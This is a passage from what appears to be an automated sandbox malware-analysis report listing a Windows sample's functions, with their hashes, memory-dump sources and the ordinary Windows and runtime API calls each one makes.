                            • Opcode Fuzzy Hash: 9e98120a8e195555edf72ad120129c45298068f11f99e9964a534d5c9f1f3217
                            • Instruction Fuzzy Hash: 2321D27522878582FA2B9B13E801BDEA6A5BB4CBD4F044421BF4B47BB5EB3CC4419711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetForegroundWindow.USER32(?,?,00000000,00000001400B2790,?,?,?,?,?,?,?,?,?,00000001400187B1), ref: 00000001400B25C5
                            • GetForegroundWindow.USER32(?,?,00000000,00000001400B2790,?,?,?,?,?,?,?,?,?,00000001400187B1), ref: 00000001400B25EC
                            • GetWindow.USER32 ref: 00000001400B261A
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Window$Foreground
                            • String ID:
                            • API String ID: 62970417-0
                            • Opcode ID: ee06a0490cff22ef96f5ca5351be9db425f6b806d17f509f6afeed50989a688e
                            • Instruction ID: fd9210b924e6b93a90964a9add371bdfc35463920d6c1d889fd4d848a5a1855e
                            • Opcode Fuzzy Hash: ee06a0490cff22ef96f5ca5351be9db425f6b806d17f509f6afeed50989a688e
                            • Instruction Fuzzy Hash: 1D015E31716A8082EB51CF57F54439AA360E74CFD0F485520FB5A17BA9DB7CC8C28B00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: System$ClassInfoParametersRegister$CursorLoadMetricsmalloc
                            • String ID:
                            • API String ID: 2336117585-0
                            • Opcode ID: 754d1816ab36756e456449ac01376925bc4a3928ece1a8e274a8677a9673e884
                            • Instruction ID: b2bbd7e06d9c04e6c5e52eefc1a3e8da1523ef1ec66eebe4bcc27bcb0ba26e40
                            • Opcode Fuzzy Hash: 754d1816ab36756e456449ac01376925bc4a3928ece1a8e274a8677a9673e884
                            • Instruction Fuzzy Hash: EF015E70B0474081FB5AEB57B8557D66291ABCDB85F8C8039AF4C5B6B2EE3CC5498710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Info
                            • String ID:
                            • API String ID: 1807457897-0
                            • Opcode ID: 875a6bbdb50fc72266c1c8ec1a33478969007426367abc21147bdd9836fdf97a
                            • Instruction ID: d86943663248e7be95c6631b085577b97a2fec81c4c921a019d65925f508522a
                            • Opcode Fuzzy Hash: 875a6bbdb50fc72266c1c8ec1a33478969007426367abc21147bdd9836fdf97a
                            • Instruction Fuzzy Hash: C2414C72604B4086FB66CF26E44439977A1E7AAFA4F489215EB49077E8CB3DC881CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2959964966-0
                            • Opcode ID: e2abaf136ee28f41b5a8625a635adb6a8a947ac5c15a8a6b20e38f870e584f70
                            • Instruction ID: e63d41fb99ca92eadf235c26b8e52a4cbc551d4fd2cb88cb556d3a34e587d885
                            • Opcode Fuzzy Hash: e2abaf136ee28f41b5a8625a635adb6a8a947ac5c15a8a6b20e38f870e584f70
                            • Instruction Fuzzy Hash: 9D21083231478286EB668F2AE5447AD76A0AF487D0F444620BB5E876F5EB38C412CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Message$Post$SendTimeout$ProcWindow
                            • String ID:
                            • API String ID: 2617672042-0
                            • Opcode ID: 8ca7f79e2b2dc012bc1ff6d2a3c25ffc445643e3103d600d79805b545e6dc9f5
                            • Instruction ID: 8a770580ead809c8af5ae64eff4bf4809891c8061968ab8f341cb2aeb6a3b72b
                            • Opcode Fuzzy Hash: 8ca7f79e2b2dc012bc1ff6d2a3c25ffc445643e3103d600d79805b545e6dc9f5
                            • Instruction Fuzzy Hash: 7C117C3571428085EBBACB3794057EA27A1B74DFD4F544926EB49677B5CE3AC842C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Message$Post
                            • String ID:
                            • API String ID: 3307098700-0
                            • Opcode ID: 49cdd6a307acda08380100e23e01ed57d6742b714445f38a35f1394f16560126
                            • Instruction ID: 644353ba6e0bf4fced860f8daca157a8bfe0b4b728ea7a68d3136756d8a12a3c
                            • Opcode Fuzzy Hash: 49cdd6a307acda08380100e23e01ed57d6742b714445f38a35f1394f16560126
                            • Instruction Fuzzy Hash: D721BEB2614BC085E7669F26B4407DD77A0FBAEF94F098225DB8427A78CB38C185CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FocusProcWindow
                            • String ID:
                            • API String ID: 1691694861-0
                            • Opcode ID: ed46a18234adf02086ce3127c657226d14fe2ce3d20d1f4bb72f49cb3fac70ed
                            • Instruction ID: 0ff08309e81e2969859d1666bfff73324adf34881c640ba24db9bc5bb3afd275
                            • Opcode Fuzzy Hash: ed46a18234adf02086ce3127c657226d14fe2ce3d20d1f4bb72f49cb3fac70ed
                            • Instruction Fuzzy Hash: 83F0E536224A84C9D6A6CB53E8083DA7325F78DFE4F944452DF4967778CE39C886C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FolderPath
                            • String ID:
                            • API String ID: 1514166925-0
                            • Opcode ID: f1061360d9b2fd9217e9ee9d36f3cf1242a77b751e62a3f17f38d7ddd7a90f7e
                            • Instruction ID: d413081babece3c0f7164e6b66c0a89de7c7ab86fb0c940af5ba0aa72fbf8f4e
                            • Opcode Fuzzy Hash: f1061360d9b2fd9217e9ee9d36f3cf1242a77b751e62a3f17f38d7ddd7a90f7e
                            • Instruction Fuzzy Hash: 8F31F63261464483EB718B16E8507EE72EAF748790F744622F79D87EE4EB38C9458740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNEL32 ref: 0000000140005340
                              • Part of subcall function 0000000140063E00: GetCurrentDirectoryW.KERNEL32(?,000000014000534D), ref: 0000000140063E1C
                              • Part of subcall function 0000000140005690: FindWindowW.USER32 ref: 000000014000571C
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CurrentDirectoryErrorFindModeWindow
                            • String ID:
                            • API String ID: 2401824476-0
                            • Opcode ID: 4a36543c0361951da01f378bf472b41f5323f9714e295fdfc23f0bf06c73c37e
                            • Instruction ID: 52a9a556d228b3e0d286a6eff281e3ed4261348c8cac3c784bafa64a3fdfa3b1
                            • Opcode Fuzzy Hash: 4a36543c0361951da01f378bf472b41f5323f9714e295fdfc23f0bf06c73c37e
                            • Instruction Fuzzy Hash: 523193B161060581FF5BFB23B8563EB22D1AB5E7E1F940125B72A872F2EE7CC5448711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Message$PostSendTimeout$ProcWindow
                            • String ID:
                            • API String ID: 2241355032-0
                            • Opcode ID: 962776bd2b70b89a195ae22277df7f23fa898e6a6c57831838e9cc32943eef62
                            • Instruction ID: 6a6a3029de623b57e0693df95bab4057e67219e1ee92d066cde79186f792176d
                            • Opcode Fuzzy Hash: 962776bd2b70b89a195ae22277df7f23fa898e6a6c57831838e9cc32943eef62
                            • Instruction Fuzzy Hash: 45F08C3130868085EAB7DB23A5047EA6354F76CFD4F480152EF49177B8CE39C882C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Message$PostSendTimeout$ProcWindow
                            • String ID:
                            • API String ID: 2241355032-0
                            • Opcode ID: 306b486a6e4f5f584901ecab84ea525f50a0f4d2d343f50411875b64e848ffb5
                            • Instruction ID: 4046fdaf443aaa27a737ac7e4dc28361eeb7e28d259f6e56eb21dda421668644
                            • Opcode Fuzzy Hash: 306b486a6e4f5f584901ecab84ea525f50a0f4d2d343f50411875b64e848ffb5
                            • Instruction Fuzzy Hash: D8F0E231224A8494E7A6CB33A8043EA3311F74CBE4F840602DF59537F4CE35C482C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Message$PostSendTimeout$DrawIconProcWindow
                            • String ID:
                            • API String ID: 2027319081-0
                            • Opcode ID: 7cb36dc2b67cea4e94318d7b87ca2db0f1f965500dcd54628d2dac5b9202af8b
                            • Instruction ID: 8114fbce3a2cbac3f61916c145bd570f0dbb11ef0dd9a2c1751900e5e3f6d33e
                            • Opcode Fuzzy Hash: 7cb36dc2b67cea4e94318d7b87ca2db0f1f965500dcd54628d2dac5b9202af8b
                            • Instruction Fuzzy Hash: 23F08C3120868095EAB6DB23A5047EA6354F76CFD4F480152EF48177B8DE39C882C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ProcWindow
                            • String ID:
                            • API String ID: 181713994-0
                            • Opcode ID: af2556c1c4a3fcd6370310f7a3c0e1890992a86b3e36e4ba8b75566f47ac8c96
                            • Instruction ID: de203f2d6380d9ade8639fd80037dc82e1eb433435b73b6210ce75ccb08005eb
                            • Opcode Fuzzy Hash: af2556c1c4a3fcd6370310f7a3c0e1890992a86b3e36e4ba8b75566f47ac8c96
                            • Instruction Fuzzy Hash: 64F0A936220A88C5D6A2DB13E8047DA6321F74CBE8F844412DF4813738CE34C88ACB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountMessagePostTick
                            • String ID:
                            • API String ID: 1233319983-0
                            • Opcode ID: dabdce3e6011770a8e8c5aa4f163d86c6325093ce6dfb0199455a7cb58cc46fd
                            • Instruction ID: 850e2b969b4af13a5fe241fb242660a5b98fef7013203b161bc82ae507039932
                            • Opcode Fuzzy Hash: dabdce3e6011770a8e8c5aa4f163d86c6325093ce6dfb0199455a7cb58cc46fd
                            • Instruction Fuzzy Hash: 08E04F36314A81C4D7A6DA63A4043DA5315F74CBD4F584452EF8953765DE35C846C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • malloc.LIBCMT ref: 00000001400AA8DB
                              • Part of subcall function 00000001400CA9A4: _FF_MSGBANNER.LIBCMT ref: 00000001400CA9D4
                              • Part of subcall function 00000001400CA9A4: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400D0AA0,?,?,00000000,00000001400CF2DD,?,?,?,00000001400CF387,?,?,00000000,00000001400CE775), ref: 00000001400CA9F9
                              • Part of subcall function 00000001400CA9A4: _callnewh.LIBCMT ref: 00000001400CAA12
                              • Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA1D
                              • Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA28
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno$AllocateHeap_callnewhmalloc
                            • String ID:
                            • API String ID: 2243056865-0
                            • Opcode ID: fcfc9a1df6e0bc85991b3739faf1ac6917ddc8aaf1b220a586ab12618ba77058
                            • Instruction ID: f2304afc234d0af73b631e82f941105809edbec6a10e5977796ee8e5d2770dea
                            • Opcode Fuzzy Hash: fcfc9a1df6e0bc85991b3739faf1ac6917ddc8aaf1b220a586ab12618ba77058
                            • Instruction Fuzzy Hash: C8F01D32B046458AEF95CB2AE08436D63A5E798F98F199125EB4947399DB3CC8D1CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • malloc.LIBCMT ref: 00000001400AA4B5
                              • Part of subcall function 00000001400CA9A4: _FF_MSGBANNER.LIBCMT ref: 00000001400CA9D4
                              • Part of subcall function 00000001400CA9A4: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400D0AA0,?,?,00000000,00000001400CF2DD,?,?,?,00000001400CF387,?,?,00000000,00000001400CE775), ref: 00000001400CA9F9
                              • Part of subcall function 00000001400CA9A4: _callnewh.LIBCMT ref: 00000001400CAA12
                              • Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA1D
                              • Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA28
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errnomalloc$AllocateHeap_callnewh
                            • String ID:
                            • API String ID: 2444859684-0
                            • Opcode ID: bb976d4ef410dca56b34cfdf591ad2465a6126ab175f72c8351aeb2425df3519
